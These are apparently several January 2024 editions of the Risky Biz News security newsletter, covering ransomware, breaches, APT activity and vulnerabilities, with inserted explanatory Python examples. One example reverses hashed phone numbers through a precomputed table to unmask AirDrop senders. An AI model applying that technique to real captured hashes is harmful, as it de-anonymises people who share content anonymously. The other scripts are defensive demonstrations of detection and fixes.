SharePoint exploitation: CISA says that threat actors are exploiting a vulnerability in Microsoft SharePoint servers. Tracked as CVE-2023-29357, the bug was patched in June of last year. The vulnerability is an elevation of privilege that can be chained with other SharePoint bugs to achieve remote code execution. Multiple technical write-ups and public PoCs on how to perform such attacks have been available online since September of last year.

Hacked WordPress sites: More than 6,700 WordPress sites have been hacked and compromised with the Balada Injector backdoor. The sites were hacked using a vulnerability (CVE-2023-6000) in the Popup Builder plugin disclosed at the start of December. Balada Injector is a malware campaign that has been active for years. Its primary role is to redirect visitors of the hacked sites to tech support scams.

Abuse of GitHub services: Recorded Future looks at how malware authors are abusing GitHub's services to host and disguise malicious content.

C&C frameworks: Cobalt Strike, Meterpreter, and Viper were the most popular command-and-control (C&C) frameworks among malware operators in 2023, according to data collected by Recorded Future. The three led by a wide margin, followed at a distance by tools like Sliver, Havoc, and Brute Ratel. The biggest change is Viper, which is now about as popular as Meterpreter.

Malware technical reports

Medusa ransomware: Palo Alto Networks has published an analysis of the Medusa ransomware operation, a dual-extortion group that launched in 2023.

Atomic Stealer: Malwarebytes has found a new version of Atomic Stealer, a macOS information stealer that was first spotted last year.

FBot: SentinelOne looks at FBot, a hacking tool used by multiple threat actors to hijack cloud infrastructure, web servers, and SaaS services.

DreamBus: Zscaler researchers look at DreamBus, a Linux-based botnet that has been active since 2019. Researchers say that over the past six months, the botnet has seen a resurgence after launching attacks against Metabase and Apache RocketMQ servers. The final payload is still a Monero miner, as before.

Aquabot: Antiy researchers have published a technical report on Aquabot, another Mirai variant spotted recently in the wild.

NoaBot: Akamai researchers have uncovered a new malware botnet named NoaBot that has been seen infecting servers across the world. NoaBot is built on top of the Mirai SSH self-spreading worm but drops a cryptocurrency miner on infected systems. Akamai says the botnet has been silently expanding since January of 2023 and appears to be connected to the P2PInfect botnet that targets Redis databases, also for cryptomining.

Sponsor section

Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.

APTs, cyber-espionage, and info-ops

Sticky Werewolf: The Sticky Werewolf APT group launched a spear-phishing operation on January 2 and 3 that targeted Russian telecommunications providers, according to Russian cybersecurity firm FACCT.

UAC-0050: Ukraine's CERT team has new details on the never-ending UAC-0050 spear-phishing campaigns targeting Ukraine.

Sandworm: Forescout has a deep dive [PDF] into the Sandworm attacks against Denmark's critical sector that were spotted last year by local authorities. The surprising main conclusion is below.

"Evidence suggests that the two waves of attacks on Danish infrastructure reported by SektorCERT were unrelated. It also suggests that the second wave was simply part of a mass exploitation campaign against unpatched firewalls, not part of a targeted attack by Sandworm or another state-sponsored actor."

Vulnerabilities, security research, and bug bounty

ColdFusion zero-day write-up: SecureLayer7 has published a technical deep dive of CVE-2023-26360, an Adobe ColdFusion zero-day exploited in the wild that was patched in March 2023.

OFBiz exploitation: Security firm VulnCheck says that of the 10,000 Apache OFBiz servers exposed online, only ~1,000 are vulnerable to a recent zero-day (CVE-2023-51467).

Cisco security updates: Cisco has released or updated seven security advisories for various products.

Unfixed Linux RCE/DoS: A Linux kernel vulnerability tracked as CVE-2023-6270, which can lead to DoS and RCE scenarios, has been sitting unfixed for more than 100 days, per Brad Spengler from Grsecurity.

Bosch thermostat firmware rewriting: Bitdefender researchers have found a vulnerability (CVE-2023-49722) in Bosch BCC100 thermostats that can be used to rewrite a device's firmware from the local LAN.

Infosec industry

New tool—ContainerCVE: Software engineer Amir Boroumand has launched a tool named ContainerCVE that scans Docker Hub images for known vulnerabilities.

New tool—Secator: French security firm FreeLabz has released Secator, a task and workflow runner that can be used for cybersecurity assessments.

Tool update—RansomLord: Version 2 of the RansomLord anti-ransomware tool is now out.

Risky Biz News: Ransomware wrecks Paraguay's largest telco

10 January 2024 at 00:30

This newsletter is brought to you by Stairwell.

A ransomware attack has wreaked havoc inside the network of Tigo, the largest mobile operator and internet service provider in Paraguay.

The incident took place last Thursday, January 4, and impacted the telco's business branch.

Around 300 servers in Tigo's data center were encrypted, according to Miguel Ángel Gaspar, director of the Paraguay Ciberseguro Foundation.

At least 300 companies were impacted downstream. The companies lost phone service and files hosted on Tigo servers.

Some government organizations are believed to have been impacted. The Paraguayan Army's cybersecurity team has urged public and private sector institutions to take steps to harden their networks in the incident's aftermath.

The Tigo attack has been attributed by local media to a ransomware group named BlackHunt. According to Fortinet, the BlackHunt group emerged at the end of 2022 and is known to breach victims via unsecured RDP connections.

[Image: BlackHunt ransom note. Image: Fortinet]

Besides encrypting data, the group is also known to steal files for secondary extortion attempts, although it does not operate a dark web data leak site like other ransomware crews.

According to a local radio station, Tigo has not contacted the group to negotiate a ransom.

The company put out a statement calling all reports on its incident "fake news," which, in turn, led to the company being ridiculed on social media and with some customers announcing plans to switch to another provider.


Breaches, hacks, and security incidents

Bit24 leak: Iranian cryptocurrency exchange Bit24.cash has leaked the personal information of more than 230,000 customers. The data leaked via an unsecured MinIO server that exposed the platform's AWS credentials. The exposed data included photos of passports, IDs, and credit cards, which customers uploaded on the site during the KYC process. [Additional coverage in Cybernews]

Inspiring Vacations leak: Australian travel agency Inspiring Vacations has leaked customer data after leaving one of its databases exposed on the internet without a password. The database leaked 26.8GB of data, containing more than 112,000 records, such as high-resolution passport images, travel visas, and itinerary tickets. [Additional coverage in The Age] [h/t Scrantic]

LoanDepot cyberattack: American mortgage provider LoanDepot has taken some of its IT infrastructure offline in the aftermath of a ransomware attack. The company is the fourth major US mortgage or real estate insurance provider hit by a cyberattack in recent months, after Mr. Cooper, Fidelity National Financial, and First American Financial.

WCC cyberattack: The World Council of Churches got hit by a cybersecurity incident over the Christmas holiday. The incident is believed to be a ransomware attack, possibly carried out by the Rhysida gang. [Additional coverage in The Record]

Ukraine repels attack on state payment system: Ukraine says it repelled Russian cyberattacks against its state payment system for the second week in a row. Officials say Russian hackers tried to destroy vital systems used for budget payments. The operation comes after Russian hackers successfully wiped servers inside Kyivstar, the country's largest mobile operator.

AlfaBank leak: Ukrainian hackers have dumped the data of 38 million customers of Alfa Bank, one of Russia's leading banks. The data was dumped by KibOrg and NLB, the groups that hacked the bank in October last year. The bank initially denied getting hacked and later tried to downplay the size of the breach.

M9 Telecom hack: A Ukrainian hacktivist group named Blackjack has breached and leaked data from Russian internet service provider M9 Telecom. The group claims it wiped more than 20 TB of the telco's data, including internal servers and the company's official website. Blackjack says the attack was only a "warm-up," and they plan to target larger telcos as revenge for Russia's attack on Kyivstar. [Additional coverage in UkrInform / English coverage in the Kyiv Independent]

Dark web site where the M9 Telecom data was leaked

General tech and privacy

Authy EOL: Twilio will discontinue its Authy 2FA authenticator app for Linux, macOS, and Windows in August this year. The company has told customers to switch to its mobile apps, which will continue to be supported.

Project Mockingbird: McAfee has unveiled Project Mockingbird, a tool to detect AI-generated audio deepfakes.

New Sentry ToS: App performance monitoring service Sentry has updated its Terms of Service to give itself the right to use its customers' data to train AI models. No opt-out option will be included.

Copilot key: Microsoft has announced plans to add a new key to its keyboards. The new button will trigger the company's Copilot AI assistant and will sit next to the Right-Alt and Space keys. This marks the first new key added to Microsoft keyboards in nearly 30 years. [Additional coverage in Sky News]

Windows hardening: Below is a calendar with Microsoft's major security and hardening dates for 2024. More details here.

Microsoft's major security and hardening dates for 2024 and 2023

OpenAI GDPR complaint: Polish privacy expert Lukasz Olejnik has filed an official GDPR complaint against OpenAI for the company's data processing practices.

Twitter becomes a problem: Verified Twitter users have pushed a wave of misinformation about the recent earthquake that hit Japan, showing how the social network has devolved from a place where you could get breaking news into a site that endangers people's lives by pushing and promoting wrong information during a crisis. [Additional coverage in Vice]

Volkswagen integrates ChatGPT: German automaker Volkswagen announced plans to integrate the ChatGPT service into its vehicles. And now you know what car you should never buy in the next 3,401 years.

Beijing lab breaks AirDrop: The Chinese government says it detained several suspects who sent inappropriate messages using the Apple AirDrop feature. The arrests come after a local Beijing tech lab named Wangshen Dongjian developed a tool to crack the AirDrop protocol and extract a sender's phone number and email address. AirDrop was widely used in China in 2022 and 2023 to anonymously share anti-government posters and materials criticizing China's leader Xi Jinping. Apple limited access to AirDrop in November of last year at the government's request. [Additional coverage in GlobalTimes]

Screenshot of the lab's AirDrop cracking tool
Screenshot of a Mastodon post
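The technical point behind the AirDrop story is worth making concrete. AirDrop's discovery handshake does not carry the sender's phone number and email in the clear but as SHA-256 hashes, and Chinese reporting on the lab describes a rainbow table, i.e. precomputation, as the cracking method. Hashing does not protect an identifier drawn from a small keyspace: every phone number in a country can be hashed in advance and matched against a captured hash. The script below, an added example and not the lab's tool or anything from the newsletter, shows that with a plain lookup table over a constructed block of numbers. It assumes the identifier is hashed as its E.164 digits without the "+"; AirDrop's exact normalisation is not modelled.

```python
"""Reverse a hashed phone number by precomputation, to show why hashing does not anonymise it.

Added example; not the Beijing lab's tool. Assumptions: the identifier is hashed as
its E.164 digits without the '+' (AirDrop's exact normalisation is not modelled
here), and the number block searched is constructed.
"""
import hashlib


def identifier_hash(identifier):
    """Unsalted SHA-256 of a contact identifier, as a discovery message would carry it."""
    return hashlib.sha256(identifier.encode("utf-8")).hexdigest()


def build_lookup_table(country_code, prefix, suffix_digits):
    """Precompute hash -> number for one number block. A whole country is a few
    billion numbers, i.e. hours of hashing on one machine, and the table is built
    once and reused against every captured hash. A rainbow table trades table size
    for lookup time but rests on the same small keyspace."""
    table = {}
    for n in range(10 ** suffix_digits):
        number = f"{country_code}{prefix}{n:0{suffix_digits}d}"
        table[identifier_hash(number)] = number
    return table


def reverse_hash(digest, table):
    """Return the identifier behind a captured hash, or None if it is outside the table."""
    return table.get(digest)


def demo():
    table = build_lookup_table("86", "13800", 5)          # constructed block of 100,000 numbers
    captured = identifier_hash("861380012345")            # stand-in for a hash from a device log
    unknown = identifier_hash("alice@example.com")        # e-mail: not in any number table
    return reverse_hash(captured, table), reverse_hash(unknown, table)


if __name__ == "__main__":
    print(demo())
```

The e-mail lookup fails only because addresses are not enumerable the way numbers are; a dictionary of known addresses reverses those too. The fix is not a slower hash but not exposing a hash of a low-entropy identifier at all, which is what private set intersection designs such as the academic PrivateDrop proposal do.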

Government, politics, and policy

DNS4EU: Oxford professor Roxana Radu looks at DNS4EU, the EU's new DNS system designed to be used by EU agencies and member states.

IGIC report: A report [PDF] from the Office of the Inspector General of the Intelligence Community has found that over-classification, lack of guidance, and tensions with cybersecurity companies have hampered the US government's efforts to boost cyber threat intel-sharing efforts. [Additional coverage in CyberScoop]

NSA and AI: An NSA official admitted that the agency is using AI and ML technologies to detect malicious Chinese cyber activity. [Additional coverage in CyberScoop]

China to hunt down aviation-tracking devices: The Chinese government has announced a nationwide operation to identify and remove devices across China that track flights and share data with foreign entities. China's Ministry of State Security says it seized some devices and penalized individuals who installed them. Officials say the devices are a national security threat because they can also track military aircraft and not just public flights. [Additional coverage in SCMP]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Chris St Myers, Stairwell's head of threat research, about managing the risk from software you absolutely must use.

Cybercrime and threat intel

Spamdot admins identified: Infosec reporter Brian Krebs has identified the real-world identities of Salomon and Icamis, the two administrators of the now-defunct cybercrime forum Spamdot. The two admins are named Alexander Grichishkin and Andrey Skvortsov. Both are Russian nationals and have already been detained by US authorities for running a bulletproof hosting service for malware operations. Both pleaded guilty, and Grichishkin is scheduled to be released from jail in February 2024 after serving his sentence. Skvortsov has yet to be sentenced.

Ransomware dev detained in the Netherlands: Dutch Police have arrested an Amsterdam man for creating and operating the Babuk Tortilla ransomware strain. Officials identified the suspect after receiving a tip from Cisco's Talos security team. Following the arrest, police officers obtained the ransomware's decryption keys, which they shared with Avast and Cisco Talos. The keys have been integrated into the Babuk ransomware decrypter available via the NoMoreRansom portal.

Myanmar rebels take control of scam city: A coalition of Myanmar rebels has taken control of Laukkaing, a city that has been a hub for online scamming operations known as "pig butchering." The Three Brotherhood Alliance is now in control of the city and the surrounding Kokang region. The rebel groups launched their offensive in October of last year with the explicit purpose of rooting out the cybercrime cartels, which they claimed were operating under the military junta's protection. [Additional coverage in The Record]

Coinbase phisher detained: The US Secret Service has arrested a 30-year-old Indian national for his involvement in a phishing operation that targeted Coinbase users. Authorities claim Chirag Tomar was part of a group that set up fake Coinbase login pages and then lured victims to the sites after emailing and calling victims. The gang is believed to have stolen more than $20 million from at least 500 Coinbase accounts. [Additional coverage in 404 Media]

Money launderer sentenced: A US judge sentenced a Nigerian national to 10 years and one month in prison for helping cybercriminals launder money obtained via internet fraud schemes.

Water Curupira: Trend Micro has published a profile on Water Curupira, an affiliate of the Black Basta ransomware gang specializing in the distribution of the Pikabot malware via email phishing campaigns. Trend Micro says systems infected with Pikabot have been used to drop backdoors and, later, the Black Basta ransomware.

RE#TURGENCE: A financially motivated hacking group known as RE#TURGENCE is targeting MSSQL databases to deploy the Mimic ransomware. According to security firm Securonix, the group gains initial access by brute-forcing the database's admin account. The company says the group operates out of the Republic of Türkiye.
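Brute-forcing the SQL Server administrator login is noisy: every failed attempt is written to the ERRORLOG as error 18456 with the login name and client address. The detector below is an added example, not code from Securonix or the RE#TURGENCE report; it parses constructed ERRORLOG lines that mimic that format (documentation IP ranges) and raises one alert per client that accumulates a threshold of failures inside a sliding window.

```python
"""Flag password guessing against SQL Server from its ERRORLOG.

Added example; not code from Securonix or the RE#TURGENCE report. The log lines
are constructed to mimic the 'Login failed for user' entries SQL Server writes
for error 18456, and the client addresses are documentation ranges.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<ip>[^\]]+)\]")


def parse_failed_logins(lines):
    """Yield (timestamp, login name, client IP) for every failed-login line."""
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Raise one alert per client IP that accumulates `threshold` failures inside a
    sliding window. Spray-style guessing shows up as many distinct login names from
    one client, so the names seen so far are included in the alert."""
    recent = defaultdict(deque)       # client IP -> failure timestamps inside the window
    names = defaultdict(set)
    alerted, alerts = set(), []
    for ts, user, ip in parse_failed_logins(lines):
        window = recent[ip]
        window.append(ts)
        names[ip].add(user)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and ip not in alerted:
            alerted.add(ip)
            alerts.append({"client": ip, "failures": len(window), "logins": sorted(names[ip]),
                           "first_seen": window[0].isoformat(timespec="seconds")})
    return alerts


_ATTACKER = "203.0.113.7"
SAMPLE_ERRORLOG = [
    "2024-01-05 10:12:01.23 Logon       Error: 18456, Severity: 14, State: 8.",
] + [
    f"2024-01-05 10:12:{sec:05.2f} Logon       Login failed for user '{user}'. Reason: Password "
    f"did not match that for the login provided. [CLIENT: {_ATTACKER}]"
    for sec, user in ((1.23, "sa"), (2.10, "sa"), (2.91, "sa"), (3.44, "admin"), (4.02, "sa"), (4.65, "sa"))
] + [
    "2024-01-05 10:12:09.77 Logon       Login failed for user 'backup'. Reason: Could not find "
    "a login matching the name provided. [CLIENT: 198.51.100.20]",
    "2024-01-05 10:13:15.00 spid52      Starting up database 'msdb'.",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_ERRORLOG):
        print(alert)
```

The same logic applies to Windows Security event 4625 or to SQL Server Audit output; the ERRORLOG is used here because it is on by default. A database exposed to the internet with a password-only sa account will trip this rule continuously, which is itself the finding.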

YouTube malware campaign: Fortinet is tracking a threat actor using YouTube videos promoting cracked software to distribute apps infected with the Lumma infostealer.

KEV update: CISA has added six vulnerabilities that are being actively exploited in the wild to its KEV database. The list includes bugs in ColdFusion, Apple, Apache Superset, Joomla, and D-Link products.

Q4 2023 DDoS trends: Internet infrastructure company Cloudflare says it saw a massive 61,839% surge in DDoS traffic that targeted environmental protection websites during the 28th United Nations Climate Change Conference (COP 28).

Malware technical reports

None in this edition.

Sponsor Section

Stairwell's Mike Wiacek demonstrates Stairwell's file analysis and threat detection platform to Risky Business host Patrick Gray. Stairwell helps you monitor and analyze every executable file in your organization, automatically collecting crucial intelligence and providing your security team with in-depth visibility and detections.

APTs, cyber-espionage, and info-ops

UAC-0184: CERT-UA has published IOCs and details about a spear-phishing campaign conducted by a group the agency is tracking as UAC-0184. The campaign was initially spotted by Trend Micro and its final payload is the Remcos RAT and the ReverseSSH shell.

Stuxnet saboteur: Dutch journalists have revealed the name of the person who helped the US and Israel deploy the Stuxnet computer virus inside Iran's nuclear program in 2008. Reporters say a Dutch engineer named Erik van Sabben installed water pumps that carried Stuxnet into Iran's uranium enrichment facility at Natanz in 2008. Van Sabben was allegedly recruited by the Dutch AIVD intelligence service, although Dutch officials say they did not know a computer virus was being deployed. Van Sabben died in a motorbike accident two weeks later near his home in Dubai, and Stuxnet spread into a global malware epidemic two years later, in 2010. [Additional coverage in De Volkskrant / English coverage in NLTimes / 2019 article on the topic]

Screenshot of a Kim Zetter tweet

Vulnerabilities, security research, and bug bounty

Zengo hacking challenge: Crypto-wallet maker Zengo launched a hacking challenge, inviting anyone to hack one of its demo wallets and keep the 10 Bitcoin (~$420,000) stored inside.

Lantronix vulnerabilities: Pentagrid researchers have identified several vulnerabilities in Lantronix EDS-MD IoT gateway devices. Fixes are scheduled to go live on January 12, 2024.

OFBiz exploitation: Prio-n researchers analyze two recent Apache OFBiz vulnerabilities, including one that is under active exploitation.

Bosch Rexroth vulnerabilities: Nozomi researchers have found 23 vulnerabilities in Bosch Rexroth nut-runners, pneumatic torque wrenches used in automotive industry production lines.

Control-M vulnerabilities: Security engineer Guillaume Quéré has found four vulnerabilities that can be chained to take control of the web console of BMC's Control-M, an application workflow orchestration solution.

CS:GO attack surface: Synacktiv researchers have published research looking at the attack surface of Counter-Strike: Global Offensive (CS:GO), one of the internet's most popular games of the past decade. The research was published after Valve launched Counter-Strike 2 last fall. The bugs Synacktiv found were never fixed, which is a very bad look for Valve.

"Overall code is legacy and does not implement in-depth security protections. [...] Reporting the bug to Valve through HackerOne managed program was a long process, as shown in the timeline available below. The ticket was closed with the release of Counter-Strike 2 and the impacted code is no longer present. In fact, to our knowledge, no patch was released in the meantime, despite multiple follow-ups."

KyberSlash attack: Security researcher Daniel J. Bernstein has published details on KyberSlash, a timing side channel in implementations of Kyber, a quantum-resistant key encapsulation mechanism. The leak comes from an integer division by the Kyber modulus whose running time depends on secret data. Many libraries have yet to be patched.
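The bug and the fix are both small, so here they are side by side. Kyber compresses a coefficient u with round(u * 2^d / q) mod 2^d, which the reference implementations wrote as an integer division by q; the patches replace that division with a multiplication by a precomputed constant and a shift, which most CPUs execute in constant time. The code below is an added example, not Bernstein's code or any Kyber library's: it derives its own constants as ceil(2^s / q) with s chosen large enough that the result is exact, proves that choice in a comment, and checks it exhaustively over the whole input range. Python integers are not constant-time; the point is the arithmetic the C fixes rely on.

```python
"""Kyber coefficient compression with and without a secret-dependent division.

Added example; not code from Bernstein's KyberSlash write-up or from any Kyber
library. The multiply-and-shift constants are derived here as ceil(2^s / q) for an
s chosen so the result is exact; they are not the constants any particular library
shipped. Python integers are not constant-time; the point is the arithmetic that
the C fixes rely on.
"""
Q = 3329  # the Kyber modulus


def compress_div(u, d):
    """Reference-style compress_d(u) = round(u * 2^d / q) mod 2^d for 0 <= u < q.
    The integer division by q is what KyberSlash targets: on many CPUs its running
    time varies with the operands, and u derives from secret key material."""
    return (((u << d) + Q // 2) // Q) & ((1 << d) - 1)


def mulshift_params(d):
    """Choose (m, s) with (x * m) >> s == x // q for every x the compressor produces.
    With m = ceil(2^s / q) = (2^s + r) / q and 0 <= r < q,
        x*m / 2^s = x/q + x*r / (q * 2^s) < x/q + x / 2^s,
    so picking 2^s > q * x_max keeps the error below 1/q and the floor never moves."""
    x_max = ((Q - 1) << d) + Q // 2
    s = (Q * x_max).bit_length()   # smallest s with 2^s > q * x_max
    m = -(-(1 << s) // Q)          # ceil(2^s / q)
    return m, s


def compress_ct(u, d):
    """Same function with the division replaced by one multiply and one shift,
    which run in constant time on the targets Kyber implementations care about
    (the C fixes use wider integer types where the product would otherwise overflow)."""
    m, s = mulshift_params(d)
    return ((((u << d) + Q // 2) * m) >> s) & ((1 << d) - 1)


def equivalent_for_all_inputs(d):
    """Exhaustive check over the whole coefficient range [0, q)."""
    return all(compress_div(u, d) == compress_ct(u, d) for u in range(Q))


if __name__ == "__main__":
    for d in (1, 4, 5, 10, 11):   # the d values Kyber uses (message bits and ciphertext compression)
        print(f"d={d:2} m,s={mulshift_params(d)} exact={equivalent_for_all_inputs(d)}")
```

The exhaustive check is cheap because the input range is only q = 3329 values per d, which is exactly why this class of fix can be verified rather than argued about. When reviewing a patched library, look for any remaining `/ KYBER_Q` or `% KYBER_Q` on values derived from the secret key or the shared secret, not just the one site the advisory named.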

ZDI stats: Trend Micro says its Zero-Day Initiative (ZDI) private bug bounty program has helped security researchers file and report 1,913 bugs throughout 2023. The company says that "nearly 3 of 4 [of all reported vulnerabilities] were rated Critical/High risk."

Patch Tuesday: Yesterday was the January 2024 Patch Tuesday. We had security updates from Adobe, Microsoft, Cisco, SAP, Fortinet, Zoom, Splunk, Joomla, Firefox, Intel, Siemens, and Schneider Electric. The Android Project, Chrome, Atlassian, Ivanti, and QNAP released security updates last week as well. This month, Microsoft patched 53 vulnerabilities. No zero-days this time.

Infosec industry

Acquisition news: Private equity firm MC² Security Fund has acquired cybersecurity firm Trustwave from Singtel for $205 million.

New tool—YARA Toolkit: Microsoft security researcher Thomas Roccia has released YARA Toolkit, a web app for writing YARA rules.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk with infosec and anti-virus veteran Martijn Grooten about how the infosec industry has changed over the years.

Risky Biz News: Turkish APT group Sea Turtle returns

8 January 2024 at 00:30

This newsletter is brought to you by Stairwell. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Hackers associated with the Turkish government are conducting new cyber-espionage operations across Europe and the Middle East, according to recent reports from PwC, StrikeReady, and Hunt & Hackett.

Tracked as Sea Turtle (Teal Kurma, Silicon, UNC1326, Cosmic Wolf), the group rose to fame between 2018 and 2020 when it conducted a series of DNS hijacking campaigns that intercepted traffic for Cypriot, Greek, and Iraqi government systems.

Since its public exposure in late 2020, the group has wound down its DNS hijacking infrastructure, and very little activity has been linked to its operations.

In recent reports, the three security firms claim the group has now re-tooled and changed its modus operandi, although some connections to its old infrastructure remained.

Sea Turtle has now been linked to the SnappyTCP backdoor, a simplistic reverse shell designed for Linux and Unix systems, which the group has been using in recent operations.

These new attacks targeted governments, telecommunications companies, and IT service providers. All three reports conclude the attacks were classic cyber-espionage operations, aimed at collecting information that can further Turkey's economic or political interests.

On top of that, Sea Turtle has also been seen running websites mimicking the sites of Turkish news outlets and bloggers, Kurdish news sites, and NGOs and TV channels in the Arab world.

Aside from victims in the Netherlands, none of the three reports mention the exact location of the group's recent operations.

According to Hunt & Hackett, initial access occurred via compromised cPanel accounts, from where the group pivoted to the victim's other infrastructure via SSH.

The group then planted the SnappyTCP backdoor for future access, which they leveraged to collect data from victim environments, such as email archives.

The StrikeReady report also mentions a cluster of Windows malware artifacts with a "software update" theme.

The three reports highlight a noticeable shift in the group's operations, moving away from DNS hijacking to a classic compromise-and-collect approach. Hunt & Hackett specifically warns telcos, ISPs, and managed service providers to secure their infrastructure, as the group has been seen going after similar organizations in attempts to pivot to accounts operated by their primary targets.


Breaches, hacks, and security incidents

Russia hacked UA webcams: Russian hackers have hijacked at least two security cameras and used their live video feeds to adjust missile strikes targeting the city of Kyiv at the start of the year. Ukraine's Security Service SBU says it detected the hacks and took down the cameras in order to prevent further abuse. The agency says that since the start of Russia's invasion, it has taken down more than 10,000 security cameras across Ukraine.

Kyivstar cyberattack: Russian hackers breached and stayed hidden inside the network of Ukrainian telco Kyivstar for at least seven months. The hackers breached the telco in May and were discovered and ousted in early December 2023. According to Illia Vitiuk, the head of Ukraine's SBU intelligence agency, the hack was carried out by Sandworm, a hacking unit inside Russia's military intelligence agency GRU. The group allegedly wiped thousands of the telco's internal systems. Vitiuk says the hack had a significant impact on the civilian population but no impact on military operations. [Additional coverage in Reuters]

Gallery Systems cyberattack: Several US museums are unable to display their art collections online after hackers hit Gallery Systems, a shared provider of IT infrastructure. [Additional coverage in ARTNews]

Xerox hack: Xerox has confirmed that hackers breached its US subsidiary as part of a ransomware attack.

Orange Spain incident: Mobile operator Orange Spain saw much of its internet traffic blackholed for several hours after an unidentified individual logged into the company's RIPE NCC account, reportedly with credentials harvested by infostealer malware and not protected by 2FA, and modified the RPKI route origin authorizations (ROAs) for its prefixes. Routers that perform route origin validation then rejected Orange's own BGP announcements as invalid. Fun, fun, fun!
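The mechanism behind the Orange Spain outage deserves a closer look, because nobody touched Orange's routers. The attacker used the hijacked RIPE NCC account to publish RPKI route origin authorizations (ROAs) that did not match Orange's real origin AS, so every network performing route origin validation (RFC 6811) classified Orange's own, unchanged announcements as Invalid and dropped them. The function below, an added example and not code from Orange, RIPE NCC or any router vendor, implements that validation and walks a legitimate announcement through the states it passes through as the ROAs are rewritten. AS 12479 is Orange Spain's real AS number; the prefix 198.51.100.0/22 and the rogue AS 64496 are documentation values standing in for the real ones.

```python
"""RFC 6811 route origin validation (ROV), applied to the Orange Spain outage.

Added example; not code from Orange, RIPE NCC or any router vendor. AS 12479 is
Orange Spain's real AS number; the prefix 198.51.100.0/22 and the rogue AS 64496
are documentation values standing in for the real ones.
"""
import ipaddress

ORANGE_ES_ASN = 12479


def rov_state(prefix, origin_asn, roas):
    """Classify an announcement against ROAs given as (prefix, max_length, asn).

    NotFound: no ROA covers the announced prefix.
    Valid:    a covering ROA names this origin AS and the announced length is
              within the ROA's maxLength.
    Invalid:  covering ROAs exist but none match; ROV-enforcing routers drop the route."""
    route = ipaddress.ip_network(prefix)
    covering = []
    for roa_prefix, max_length, asn in roas:
        roa = ipaddress.ip_network(roa_prefix)
        if roa.version == route.version and route.subnet_of(roa):
            covering.append((max_length, asn))
    if not covering:
        return "NotFound"
    for max_length, asn in covering:
        if asn == origin_asn and route.prefixlen <= max_length:
            return "Valid"
    return "Invalid"


def simulate_incident(prefix="198.51.100.0/22", asn=ORANGE_ES_ASN):
    """The states a legitimate announcement passes through when someone with the
    holder's RIPE account rewrites the ROAs. Only the RPKI data changes; the BGP
    announcement itself is identical in every case."""
    correct = [(prefix, 22, asn)]
    rewritten = [(prefix, 22, 64496)]   # ROA now names a different origin AS
    as0 = [(prefix, 22, 0)]             # AS0 ROA (RFC 7607): nobody may originate this prefix
    return {
        "no_roa": rov_state(prefix, asn, []),
        "correct_roa": rov_state(prefix, asn, correct),
        "roa_points_elsewhere": rov_state(prefix, asn, rewritten),
        "as0_roa": rov_state(prefix, asn, as0),
        "more_specific_than_maxlength": rov_state("198.51.100.0/24", asn, correct),
    }


if __name__ == "__main__":
    for scenario, state in simulate_incident().items():
        print(f"{scenario:30} {state}")
```

Two practical consequences follow. A prefix with no ROA is merely NotFound and keeps working, so an attacker with the registry account can do more damage to a network that has deployed RPKI than to one that has not, which is an argument for protecting that account (2FA, no shared credentials) rather than against RPKI. And the damage is proportional to how many upstreams and peers enforce ROV, which is why the outage was partial rather than total.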

23andMe drama: 23andMe is trying to blame its users for its recent data breach by claiming they are at fault for using weak passwords. The new drama comes after the company was sued more than 30 times for a recent security breach and after the company sneakily modified its terms of service to force people into arbitration. [Additional coverage in TechCrunch]

Beirut airport hack: A hacktivist group defaced the public screens at the Beirut international airport in Lebanon with anti-Iran and anti-Hezbollah messages. A group calling itself "Lord and the People" took credit for the incident. [Additional coverage in ArabNews]

CoinsPaid hacked again: Estonian cryptocurrency platform CoinsPaid fell victim to a cyberattack and lost an estimated $7.5 million worth of crypto assets. This is the company's second hack after it lost $37.3 million in July 2023. CoinsPaid blamed last year's incident on North Korean hackers. [Additional coverage in CryptoNews]

Gamma crypto-heist: The Gamma cryptocurrency platform says it lost $6.1 million worth of assets after a threat actor abused the infrastructure of one of its providers and manipulated exchange prices.

Radiant Capital cyber-heist: A threat actor has stolen almost $4.5 million worth of crypto-assets from crypto-platform Radiant Capital. The incident is suspected to have been a flash loan attack. [Additional coverage in Coinpedia]

Mandiant Twitter scam: A threat actor hijacked the Twitter account of Google's Mandiant division and promoted a cryptocurrency scam. It was one of many incidents that hit high-profile Twitter gold badge accounts over the past week. The hacks appear to be linked to a new underground market where hacked Twitter business accounts are being offered for sale. [Additional coverage in ArsTechnica]

General tech and privacy

Merck settles NotPetya lawsuit: American pharmaceutical company Merck has settled a lawsuit with three insurers in relation to the NotPetya cyberattacks. The parties settled the lawsuit a day before oral arguments were meant to be heard in front of the New Jersey Supreme Court. The company sought $1.4 billion in damages from its insurers following the 2017 NotPetya cyberattack. A New Jersey appeals court ruled the company was entitled to $700 million in claims before the insurers moved the case to the state's Supreme Court. The terms of the settlement have not been disclosed. [Additional coverage in Insurance Journal and Bloomberg]

Facebook creepy tracking: Meta has enabled a new feature named Link History for all Facebook users that will keep track of their visited links and use the data to show ads. The feature was forcibly enabled by default for all users, and you can only disable it through an option hidden deep in the app's settings. [Additional coverage in SearchEngineLand]

LastPass master password changes: Password management service LastPass is forcing customers to choose master passwords of at least 12 characters. The company is enforcing the new rule more than a year after it suffered a security breach in November 2022. In September 2023, security experts found that hackers had cracked some of the weaker master passwords and stolen more than $35 million worth of cryptocurrency from LastPass customers.

AWS security best practices: The AWS team has published a guide covering best practices for configuring AWS security services. This is a guide for how to configure AWS security tools, not how to secure AWS infrastructure.

